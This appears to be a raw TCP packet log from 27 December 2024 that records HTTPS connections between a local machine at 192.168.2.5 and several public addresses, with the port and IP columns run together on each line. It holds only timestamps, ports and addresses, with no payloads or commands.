                                                                                                                                                                                                                                                                                                  Dec 27, 2024 07:01:38.766431093 CET4435000023.44.201.19192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 27, 2024 07:01:38.766599894 CET50000443192.168.2.523.44.201.19
                                                                                                                                                                                                                                                                                                  Dec 27, 2024 07:01:38.767365932 CET50001443192.168.2.523.44.201.19
                                                                                                                                                                                                                                                                                                  Dec 27, 2024 07:01:38.767404079 CET4435000123.44.201.19192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 27, 2024 07:01:38.767546892 CET50001443192.168.2.523.44.201.19
                                                                                                                                                                                                                                                                                                  Dec 27, 2024 07:01:38.767766953 CET50000443192.168.2.523.44.201.19
                                                                                                                                                                                                                                                                                                  Dec 27, 2024 07:01:38.767802954 CET4435000023.44.201.19192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 27, 2024 07:01:38.768423080 CET50001443192.168.2.523.44.201.19
                                                                                                                                                                                                                                                                                                  Dec 27, 2024 07:01:38.768434048 CET4435000123.44.201.19192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 27, 2024 07:01:38.769459009 CET50002443192.168.2.5204.79.197.219
                                                                                                                                                                                                                                                                                                  Dec 27, 2024 07:01:38.769570112 CET44350002204.79.197.219192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 27, 2024 07:01:38.769643068 CET50002443192.168.2.5204.79.197.219
                                                                                                                                                                                                                                                                                                  Dec 27, 2024 07:01:38.770037889 CET50003443192.168.2.5204.79.197.219
                                                                                                                                                                                                                                                                                                  Dec 27, 2024 07:01:38.770067930 CET44350003204.79.197.219192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 27, 2024 07:01:38.770185947 CET50002443192.168.2.5204.79.197.219
                                                                                                                                                                                                                                                                                                  Dec 27, 2024 07:01:38.770209074 CET50003443192.168.2.5204.79.197.219
                                                                                                                                                                                                                                                                                                  Dec 27, 2024 07:01:38.770216942 CET44350002204.79.197.219192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 27, 2024 07:01:38.770471096 CET50003443192.168.2.5204.79.197.219
                                                                                                                                                                                                                                                                                                  Dec 27, 2024 07:01:38.770483017 CET44350003204.79.197.219192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 27, 2024 07:01:38.802292109 CET44349972188.245.216.205192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 27, 2024 07:01:38.802369118 CET49972443192.168.2.5188.245.216.205
                                                                                                                                                                                                                                                                                                  Dec 27, 2024 07:01:38.802375078 CET44349972188.245.216.205192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 27, 2024 07:01:38.802403927 CET49972443192.168.2.5188.245.216.205
                                                                                                                                                                                                                                                                                                  Dec 27, 2024 07:01:38.802417994 CET44349972188.245.216.205192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 27, 2024 07:01:38.802473068 CET49972443192.168.2.5188.245.216.205
                                                                                                                                                                                                                                                                                                  Dec 27, 2024 07:01:38.803200960 CET49972443192.168.2.5188.245.216.205
                                                                                                                                                                                                                                                                                                  Dec 27, 2024 07:01:38.803211927 CET44349972188.245.216.205192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 27, 2024 07:01:38.810677052 CET4434998213.89.178.27192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 27, 2024 07:01:38.810906887 CET49982443192.168.2.513.89.178.27
                                                                                                                                                                                                                                                                                                  Dec 27, 2024 07:01:38.810914993 CET4434998213.89.178.27192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 27, 2024 07:01:38.812763929 CET4434998213.89.178.27192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 27, 2024 07:01:38.812875032 CET49982443192.168.2.513.89.178.27
                                                                                                                                                                                                                                                                                                  Dec 27, 2024 07:01:38.813698053 CET49982443192.168.2.513.89.178.27
                                                                                                                                                                                                                                                                                                  Dec 27, 2024 07:01:38.813782930 CET4434998213.89.178.27192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 27, 2024 07:01:38.814059973 CET49982443192.168.2.513.89.178.27
                                                                                                                                                                                                                                                                                                  Dec 27, 2024 07:01:38.814059973 CET49982443192.168.2.513.89.178.27
                                                                                                                                                                                                                                                                                                  Dec 27, 2024 07:01:38.814068079 CET4434998213.89.178.27192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 27, 2024 07:01:38.814105034 CET4434998213.89.178.27192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 27, 2024 07:01:38.865050077 CET49982443192.168.2.513.89.178.27
                                                                                                                                                                                                                                                                                                  Dec 27, 2024 07:01:39.330065966 CET50004443192.168.2.5188.245.216.205
                                                                                                                                                                                                                                                                                                  Dec 27, 2024 07:01:39.330156088 CET44350004188.245.216.205192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 27, 2024 07:01:39.330688953 CET50004443192.168.2.5188.245.216.205
                                                                                                                                                                                                                                                                                                  Dec 27, 2024 07:01:39.330939054 CET50004443192.168.2.5188.245.216.205
                                                                                                                                                                                                                                                                                                  Dec 27, 2024 07:01:39.330970049 CET44350004188.245.216.205192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 27, 2024 07:01:39.406405926 CET4434998213.89.178.27192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 27, 2024 07:01:39.406599998 CET4434998213.89.178.27192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 27, 2024 07:01:39.406733036 CET49982443192.168.2.513.89.178.27
                                                                                                                                                                                                                                                                                                  Dec 27, 2024 07:01:39.406975985 CET49982443192.168.2.513.89.178.27
                                                                                                                                                                                                                                                                                                  Dec 27, 2024 07:01:39.406987906 CET4434998213.89.178.27192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 27, 2024 07:01:39.407005072 CET49982443192.168.2.513.89.178.27
                                                                                                                                                                                                                                                                                                  Dec 27, 2024 07:01:39.407018900 CET49982443192.168.2.513.89.178.27
                                                                                                                                                                                                                                                                                                  Dec 27, 2024 07:01:39.464015961 CET4434999518.164.116.98192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 27, 2024 07:01:39.464210987 CET49995443192.168.2.518.164.116.98
                                                                                                                                                                                                                                                                                                  Dec 27, 2024 07:01:39.464245081 CET4434999518.164.116.98192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 27, 2024 07:01:39.464595079 CET4434999518.164.116.98192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 27, 2024 07:01:39.465079069 CET49995443192.168.2.518.164.116.98
                                                                                                                                                                                                                                                                                                  Dec 27, 2024 07:01:39.465151072 CET4434999518.164.116.98192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 27, 2024 07:01:39.465231895 CET49995443192.168.2.518.164.116.98
                                                                                                                                                                                                                                                                                                  Dec 27, 2024 07:01:39.507239103 CET49995443192.168.2.518.164.116.98
                                                                                                                                                                                                                                                                                                  Dec 27, 2024 07:01:39.507272005 CET4434999518.164.116.98192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 27, 2024 07:01:39.603523016 CET44349997188.245.216.205192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 27, 2024 07:01:39.603627920 CET49997443192.168.2.5188.245.216.205
                                                                                                                                                                                                                                                                                                  Dec 27, 2024 07:01:39.614193916 CET49997443192.168.2.5188.245.216.205
                                                                                                                                                                                                                                                                                                  Dec 27, 2024 07:01:39.614231110 CET44349997188.245.216.205192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 27, 2024 07:01:39.616647005 CET49997443192.168.2.5188.245.216.205
                                                                                                                                                                                                                                                                                                  Dec 27, 2024 07:01:39.616666079 CET44349997188.245.216.205192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 27, 2024 07:01:39.616724968 CET49997443192.168.2.5188.245.216.205
                                                                                                                                                                                                                                                                                                  Dec 27, 2024 07:01:39.616750002 CET44349997188.245.216.205192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 27, 2024 07:01:39.616841078 CET49997443192.168.2.5188.245.216.205
                                                                                                                                                                                                                                                                                                  Dec 27, 2024 07:01:39.616868019 CET44349997188.245.216.205192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 27, 2024 07:01:39.617023945 CET49997443192.168.2.5188.245.216.205
                                                                                                                                                                                                                                                                                                  Dec 27, 2024 07:01:39.617058039 CET44349997188.245.216.205192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 27, 2024 07:01:39.617185116 CET49997443192.168.2.5188.245.216.205
                                                                                                                                                                                                                                                                                                  Dec 27, 2024 07:01:39.617218971 CET44349997188.245.216.205192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 27, 2024 07:01:39.617252111 CET49997443192.168.2.5188.245.216.205
                                                                                                                                                                                                                                                                                                  Dec 27, 2024 07:01:39.617266893 CET44349997188.245.216.205192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 27, 2024 07:01:39.617299080 CET49997443192.168.2.5188.245.216.205
                                                                                                                                                                                                                                                                                                  Dec 27, 2024 07:01:39.617316008 CET44349997188.245.216.205192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 27, 2024 07:01:39.934022903 CET4434999518.164.116.98192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 27, 2024 07:01:39.934103012 CET4434999518.164.116.98192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 27, 2024 07:01:39.934432030 CET49995443192.168.2.518.164.116.98
                                                                                                                                                                                                                                                                                                  Dec 27, 2024 07:01:39.935092926 CET49995443192.168.2.518.164.116.98
                                                                                                                                                                                                                                                                                                  Dec 27, 2024 07:01:39.935112953 CET4434999518.164.116.98192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 27, 2024 07:01:40.006988049 CET4434999820.110.205.119192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 27, 2024 07:01:40.007555962 CET49998443192.168.2.520.110.205.119
                                                                                                                                                                                                                                                                                                  Dec 27, 2024 07:01:40.007642031 CET4434999820.110.205.119192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 27, 2024 07:01:40.008009911 CET4434999820.110.205.119192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 27, 2024 07:01:40.008373976 CET49998443192.168.2.520.110.205.119
                                                                                                                                                                                                                                                                                                  Dec 27, 2024 07:01:40.008440971 CET4434999820.110.205.119192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 27, 2024 07:01:40.008536100 CET49998443192.168.2.520.110.205.119
                                                                                                                                                                                                                                                                                                  Dec 27, 2024 07:01:40.017712116 CET4435000023.44.201.19192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 27, 2024 07:01:40.017890930 CET50000443192.168.2.523.44.201.19
                                                                                                                                                                                                                                                                                                  Dec 27, 2024 07:01:40.017915964 CET4435000023.44.201.19192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 27, 2024 07:01:40.019372940 CET4435000023.44.201.19192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 27, 2024 07:01:40.019437075 CET50000443192.168.2.523.44.201.19
                                                                                                                                                                                                                                                                                                  Dec 27, 2024 07:01:40.020304918 CET50000443192.168.2.523.44.201.19
                                                                                                                                                                                                                                                                                                  Dec 27, 2024 07:01:40.020385027 CET4435000023.44.201.19192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 27, 2024 07:01:40.053577900 CET49998443192.168.2.520.110.205.119
                                                                                                                                                                                                                                                                                                  Dec 27, 2024 07:01:40.053666115 CET4434999820.110.205.119192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 27, 2024 07:01:40.069974899 CET50000443192.168.2.523.44.201.19
                                                                                                                                                                                                                                                                                                  Dec 27, 2024 07:01:40.069993973 CET4435000023.44.201.19192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 27, 2024 07:01:40.079701900 CET4435000123.44.201.19192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 27, 2024 07:01:40.080182076 CET50001443192.168.2.523.44.201.19
                                                                                                                                                                                                                                                                                                  Dec 27, 2024 07:01:40.080199003 CET4435000123.44.201.19192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 27, 2024 07:01:40.081075907 CET4435000123.44.201.19192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 27, 2024 07:01:40.081130028 CET50001443192.168.2.523.44.201.19
                                                                                                                                                                                                                                                                                                  Dec 27, 2024 07:01:40.082036018 CET50001443192.168.2.523.44.201.19
                                                                                                                                                                                                                                                                                                  Dec 27, 2024 07:01:40.082087994 CET4435000123.44.201.19192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 27, 2024 07:01:40.115664005 CET50000443192.168.2.523.44.201.19
                                                                                                                                                                                                                                                                                                  Dec 27, 2024 07:01:40.131469965 CET50001443192.168.2.523.44.201.19
                                                                                                                                                                                                                                                                                                  Dec 27, 2024 07:01:40.131500006 CET4435000123.44.201.19192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 27, 2024 07:01:40.178677082 CET50001443192.168.2.523.44.201.19
                                                                                                                                                                                                                                                                                                  Dec 27, 2024 07:01:40.347831964 CET44350003204.79.197.219192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 27, 2024 07:01:40.348138094 CET50003443192.168.2.5204.79.197.219
                                                                                                                                                                                                                                                                                                  Dec 27, 2024 07:01:40.348150969 CET44350003204.79.197.219192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 27, 2024 07:01:40.349009991 CET44350003204.79.197.219192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 27, 2024 07:01:40.349054098 CET50003443192.168.2.5204.79.197.219
                                                                                                                                                                                                                                                                                                  Dec 27, 2024 07:01:40.349994898 CET50003443192.168.2.5204.79.197.219
                                                                                                                                                                                                                                                                                                  Dec 27, 2024 07:01:40.350045919 CET44350003204.79.197.219192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 27, 2024 07:01:40.396130085 CET50003443192.168.2.5204.79.197.219
                                                                                                                                                                                                                                                                                                  Dec 27, 2024 07:01:40.396140099 CET44350003204.79.197.219192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 27, 2024 07:01:40.427489042 CET44350002204.79.197.219192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 27, 2024 07:01:40.427845001 CET50002443192.168.2.5204.79.197.219
                                                                                                                                                                                                                                                                                                  Dec 27, 2024 07:01:40.427911043 CET44350002204.79.197.219192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 27, 2024 07:01:40.429805040 CET44350002204.79.197.219192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 27, 2024 07:01:40.429860115 CET50002443192.168.2.5204.79.197.219
                                                                                                                                                                                                                                                                                                  Dec 27, 2024 07:01:40.430470943 CET50002443192.168.2.5204.79.197.219
                                                                                                                                                                                                                                                                                                  Dec 27, 2024 07:01:40.430563927 CET44350002204.79.197.219192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 27, 2024 07:01:40.444304943 CET50003443192.168.2.5204.79.197.219
                                                                                                                                                                                                                                                                                                  Dec 27, 2024 07:01:40.470365047 CET4434999820.110.205.119192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 27, 2024 07:01:40.470473051 CET4434999820.110.205.119192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 27, 2024 07:01:40.470539093 CET49998443192.168.2.520.110.205.119
                                                                                                                                                                                                                                                                                                  Dec 27, 2024 07:01:40.471698999 CET49998443192.168.2.520.110.205.119
                                                                                                                                                                                                                                                                                                  Dec 27, 2024 07:01:40.471752882 CET4434999820.110.205.119192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 27, 2024 07:01:40.475579023 CET50002443192.168.2.5204.79.197.219
                                                                                                                                                                                                                                                                                                  Dec 27, 2024 07:01:40.475632906 CET44350002204.79.197.219192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 27, 2024 07:01:40.522429943 CET50002443192.168.2.5204.79.197.219
                                                                                                                                                                                                                                                                                                  Dec 27, 2024 07:01:40.797880888 CET44350004188.245.216.205192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 27, 2024 07:01:40.797991037 CET50004443192.168.2.5188.245.216.205
                                                                                                                                                                                                                                                                                                  Dec 27, 2024 07:01:40.798405886 CET50004443192.168.2.5188.245.216.205
                                                                                                                                                                                                                                                                                                  Dec 27, 2024 07:01:40.798428059 CET44350004188.245.216.205192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 27, 2024 07:01:40.799894094 CET50004443192.168.2.5188.245.216.205
                                                                                                                                                                                                                                                                                                  Dec 27, 2024 07:01:40.799904108 CET44350004188.245.216.205192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 27, 2024 07:01:40.799957037 CET50004443192.168.2.5188.245.216.205
                                                                                                                                                                                                                                                                                                  Dec 27, 2024 07:01:40.799968958 CET44350004188.245.216.205192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 27, 2024 07:01:40.799979925 CET50004443192.168.2.5188.245.216.205
                                                                                                                                                                                                                                                                                                  Dec 27, 2024 07:01:40.799988031 CET44350004188.245.216.205192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 27, 2024 07:01:40.800057888 CET50004443192.168.2.5188.245.216.205
                                                                                                                                                                                                                                                                                                  Dec 27, 2024 07:01:40.800072908 CET44350004188.245.216.205192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 27, 2024 07:01:40.800086975 CET50004443192.168.2.5188.245.216.205
                                                                                                                                                                                                                                                                                                  Dec 27, 2024 07:01:40.800095081 CET44350004188.245.216.205192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 27, 2024 07:01:40.800178051 CET50004443192.168.2.5188.245.216.205
                                                                                                                                                                                                                                                                                                  Dec 27, 2024 07:01:40.800195932 CET50004443192.168.2.5188.245.216.205
                                                                                                                                                                                                                                                                                                  Dec 27, 2024 07:01:40.800195932 CET50004443192.168.2.5188.245.216.205
                                                                                                                                                                                                                                                                                                  Dec 27, 2024 07:01:40.800225019 CET44350004188.245.216.205192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 27, 2024 07:01:40.800323009 CET50004443192.168.2.5188.245.216.205
                                                                                                                                                                                                                                                                                                  Dec 27, 2024 07:01:40.800335884 CET44350004188.245.216.205192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 27, 2024 07:01:40.800405025 CET50004443192.168.2.5188.245.216.205
                                                                                                                                                                                                                                                                                                  Dec 27, 2024 07:01:40.800415993 CET44350004188.245.216.205192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 27, 2024 07:01:40.800441027 CET50004443192.168.2.5188.245.216.205
                                                                                                                                                                                                                                                                                                  Dec 27, 2024 07:01:40.800457954 CET44350004188.245.216.205192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 27, 2024 07:01:40.800508022 CET50004443192.168.2.5188.245.216.205
                                                                                                                                                                                                                                                                                                  Dec 27, 2024 07:01:40.800517082 CET44350004188.245.216.205192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 27, 2024 07:01:40.800539017 CET50004443192.168.2.5188.245.216.205
                                                                                                                                                                                                                                                                                                  Dec 27, 2024 07:01:40.800556898 CET50004443192.168.2.5188.245.216.205
                                                                                                                                                                                                                                                                                                  Dec 27, 2024 07:01:40.800574064 CET44350004188.245.216.205192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 27, 2024 07:01:40.800582886 CET44350004188.245.216.205192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 27, 2024 07:01:40.800609112 CET50004443192.168.2.5188.245.216.205
                                                                                                                                                                                                                                                                                                  Dec 27, 2024 07:01:40.800618887 CET44350004188.245.216.205192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 27, 2024 07:01:40.800621986 CET50004443192.168.2.5188.245.216.205
                                                                                                                                                                                                                                                                                                  Dec 27, 2024 07:01:40.800628901 CET44350004188.245.216.205192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 27, 2024 07:01:40.800656080 CET50004443192.168.2.5188.245.216.205
                                                                                                                                                                                                                                                                                                  Dec 27, 2024 07:01:40.800667048 CET44350004188.245.216.205192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 27, 2024 07:01:40.800690889 CET50004443192.168.2.5188.245.216.205
                                                                                                                                                                                                                                                                                                  Dec 27, 2024 07:01:40.800704956 CET44350004188.245.216.205192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 27, 2024 07:01:40.800723076 CET50004443192.168.2.5188.245.216.205
                                                                                                                                                                                                                                                                                                  Dec 27, 2024 07:01:40.800733089 CET44350004188.245.216.205192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 27, 2024 07:01:40.800741911 CET50004443192.168.2.5188.245.216.205
                                                                                                                                                                                                                                                                                                  Dec 27, 2024 07:01:40.800748110 CET44350004188.245.216.205192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 27, 2024 07:01:40.800765038 CET50004443192.168.2.5188.245.216.205
                                                                                                                                                                                                                                                                                                  Dec 27, 2024 07:01:40.800770998 CET44350004188.245.216.205192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 27, 2024 07:01:40.800800085 CET50004443192.168.2.5188.245.216.205
                                                                                                                                                                                                                                                                                                  Dec 27, 2024 07:01:40.800808907 CET44350004188.245.216.205192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 27, 2024 07:01:40.800827980 CET50004443192.168.2.5188.245.216.205
                                                                                                                                                                                                                                                                                                  Dec 27, 2024 07:01:40.800841093 CET44350004188.245.216.205192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 27, 2024 07:01:40.800877094 CET50004443192.168.2.5188.245.216.205
                                                                                                                                                                                                                                                                                                  Dec 27, 2024 07:01:40.800889015 CET44350004188.245.216.205192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 27, 2024 07:01:40.800955057 CET50004443192.168.2.5188.245.216.205
                                                                                                                                                                                                                                                                                                  Dec 27, 2024 07:01:40.800966978 CET44350004188.245.216.205192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 27, 2024 07:01:40.800986052 CET50004443192.168.2.5188.245.216.205
                                                                                                                                                                                                                                                                                                  Dec 27, 2024 07:01:40.800995111 CET44350004188.245.216.205192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 27, 2024 07:01:40.801017046 CET50004443192.168.2.5188.245.216.205
                                                                                                                                                                                                                                                                                                  Dec 27, 2024 07:01:40.801024914 CET44350004188.245.216.205192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 27, 2024 07:01:40.801045895 CET50004443192.168.2.5188.245.216.205
                                                                                                                                                                                                                                                                                                  Dec 27, 2024 07:01:40.801058054 CET44350004188.245.216.205192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 27, 2024 07:01:40.801075935 CET50004443192.168.2.5188.245.216.205
                                                                                                                                                                                                                                                                                                  Dec 27, 2024 07:01:40.801083088 CET44350004188.245.216.205192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 27, 2024 07:01:40.801091909 CET50004443192.168.2.5188.245.216.205
                                                                                                                                                                                                                                                                                                  Dec 27, 2024 07:01:40.801096916 CET44350004188.245.216.205192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 27, 2024 07:01:40.801111937 CET50004443192.168.2.5188.245.216.205
                                                                                                                                                                                                                                                                                                  Dec 27, 2024 07:01:40.801120996 CET44350004188.245.216.205192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 27, 2024 07:01:40.801131964 CET50004443192.168.2.5188.245.216.205
                                                                                                                                                                                                                                                                                                  Dec 27, 2024 07:01:40.801139116 CET44350004188.245.216.205192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 27, 2024 07:01:40.801192045 CET50004443192.168.2.5188.245.216.205
                                                                                                                                                                                                                                                                                                  Dec 27, 2024 07:01:40.801203012 CET44350004188.245.216.205192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 27, 2024 07:01:40.801218987 CET50004443192.168.2.5188.245.216.205
                                                                                                                                                                                                                                                                                                  Dec 27, 2024 07:01:40.801227093 CET44350004188.245.216.205192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 27, 2024 07:01:40.801243067 CET50004443192.168.2.5188.245.216.205
                                                                                                                                                                                                                                                                                                  Dec 27, 2024 07:01:40.801265955 CET50004443192.168.2.5188.245.216.205
                                                                                                                                                                                                                                                                                                  Dec 27, 2024 07:01:40.801351070 CET50004443192.168.2.5188.245.216.205
                                                                                                                                                                                                                                                                                                  Dec 27, 2024 07:01:40.801373959 CET50004443192.168.2.5188.245.216.205
                                                                                                                                                                                                                                                                                                  Dec 27, 2024 07:01:40.801387072 CET50004443192.168.2.5188.245.216.205
                                                                                                                                                                                                                                                                                                  Dec 27, 2024 07:01:40.801402092 CET50004443192.168.2.5188.245.216.205
                                                                                                                                                                                                                                                                                                  Dec 27, 2024 07:01:40.801428080 CET50004443192.168.2.5188.245.216.205
                                                                                                                                                                                                                                                                                                  Dec 27, 2024 07:01:40.801446915 CET50004443192.168.2.5188.245.216.205
                                                                                                                                                                                                                                                                                                  Dec 27, 2024 07:01:40.801459074 CET50004443192.168.2.5188.245.216.205
                                                                                                                                                                                                                                                                                                  Dec 27, 2024 07:01:40.801501989 CET50004443192.168.2.5188.245.216.205
                                                                                                                                                                                                                                                                                                  Dec 27, 2024 07:01:40.801538944 CET50004443192.168.2.5188.245.216.205
                                                                                                                                                                                                                                                                                                  Dec 27, 2024 07:01:40.801558018 CET50004443192.168.2.5188.245.216.205
                                                                                                                                                                                                                                                                                                  Dec 27, 2024 07:01:40.801597118 CET50004443192.168.2.5188.245.216.205
                                                                                                                                                                                                                                                                                                  Dec 27, 2024 07:01:40.801619053 CET50004443192.168.2.5188.245.216.205
                                                                                                                                                                                                                                                                                                  Dec 27, 2024 07:01:40.801635981 CET50004443192.168.2.5188.245.216.205
                                                                                                                                                                                                                                                                                                  Dec 27, 2024 07:01:40.801676035 CET50004443192.168.2.5188.245.216.205
                                                                                                                                                                                                                                                                                                  Dec 27, 2024 07:01:40.801697016 CET50004443192.168.2.5188.245.216.205
                                                                                                                                                                                                                                                                                                  Dec 27, 2024 07:01:40.801723957 CET50004443192.168.2.5188.245.216.205
                                                                                                                                                                                                                                                                                                  Dec 27, 2024 07:01:40.843343019 CET44350004188.245.216.205192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 27, 2024 07:01:40.843509912 CET50004443192.168.2.5188.245.216.205
                                                                                                                                                                                                                                                                                                  Dec 27, 2024 07:01:40.843554974 CET50004443192.168.2.5188.245.216.205
                                                                                                                                                                                                                                                                                                  Dec 27, 2024 07:01:40.843584061 CET50004443192.168.2.5188.245.216.205
                                                                                                                                                                                                                                                                                                  Dec 27, 2024 07:01:40.843615055 CET50004443192.168.2.5188.245.216.205
                                                                                                                                                                                                                                                                                                  Dec 27, 2024 07:01:40.843632936 CET50004443192.168.2.5188.245.216.205
                                                                                                                                                                                                                                                                                                  Dec 27, 2024 07:01:40.843651056 CET50004443192.168.2.5188.245.216.205
                                                                                                                                                                                                                                                                                                  Dec 27, 2024 07:01:40.843663931 CET50004443192.168.2.5188.245.216.205
                                                                                                                                                                                                                                                                                                  Dec 27, 2024 07:01:40.843688965 CET50004443192.168.2.5188.245.216.205
                                                                                                                                                                                                                                                                                                  Dec 27, 2024 07:01:40.843698978 CET50004443192.168.2.5188.245.216.205
                                                                                                                                                                                                                                                                                                  Dec 27, 2024 07:01:40.843714952 CET50004443192.168.2.5188.245.216.205
                                                                                                                                                                                                                                                                                                  Dec 27, 2024 07:01:40.843733072 CET50004443192.168.2.5188.245.216.205
                                                                                                                                                                                                                                                                                                  Dec 27, 2024 07:01:40.843745947 CET50004443192.168.2.5188.245.216.205
                                                                                                                                                                                                                                                                                                  Dec 27, 2024 07:01:40.843780041 CET50004443192.168.2.5188.245.216.205
                                                                                                                                                                                                                                                                                                  Dec 27, 2024 07:01:40.843802929 CET50004443192.168.2.5188.245.216.205
                                                                                                                                                                                                                                                                                                  Dec 27, 2024 07:01:40.843894958 CET50004443192.168.2.5188.245.216.205
                                                                                                                                                                                                                                                                                                  Dec 27, 2024 07:01:40.843924046 CET50004443192.168.2.5188.245.216.205
                                                                                                                                                                                                                                                                                                  Dec 27, 2024 07:01:40.843945980 CET50004443192.168.2.5188.245.216.205
                                                                                                                                                                                                                                                                                                  Dec 27, 2024 07:01:40.843971014 CET50004443192.168.2.5188.245.216.205
                                                                                                                                                                                                                                                                                                  Dec 27, 2024 07:01:40.844028950 CET50004443192.168.2.5188.245.216.205
                                                                                                                                                                                                                                                                                                  Dec 27, 2024 07:01:40.844053030 CET50004443192.168.2.5188.245.216.205
                                                                                                                                                                                                                                                                                                  Dec 27, 2024 07:01:40.891369104 CET44350004188.245.216.205192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 27, 2024 07:01:40.891565084 CET50004443192.168.2.5188.245.216.205
                                                                                                                                                                                                                                                                                                  Dec 27, 2024 07:01:40.891640902 CET50004443192.168.2.5188.245.216.205
                                                                                                                                                                                                                                                                                                  Dec 27, 2024 07:01:40.891663074 CET50004443192.168.2.5188.245.216.205
                                                                                                                                                                                                                                                                                                  Dec 27, 2024 07:01:40.891717911 CET50004443192.168.2.5188.245.216.205
                                                                                                                                                                                                                                                                                                  Dec 27, 2024 07:01:40.891740084 CET50004443192.168.2.5188.245.216.205
                                                                                                                                                                                                                                                                                                  Dec 27, 2024 07:01:40.891757965 CET50004443192.168.2.5188.245.216.205
                                                                                                                                                                                                                                                                                                  Dec 27, 2024 07:01:40.891803980 CET50004443192.168.2.5188.245.216.205
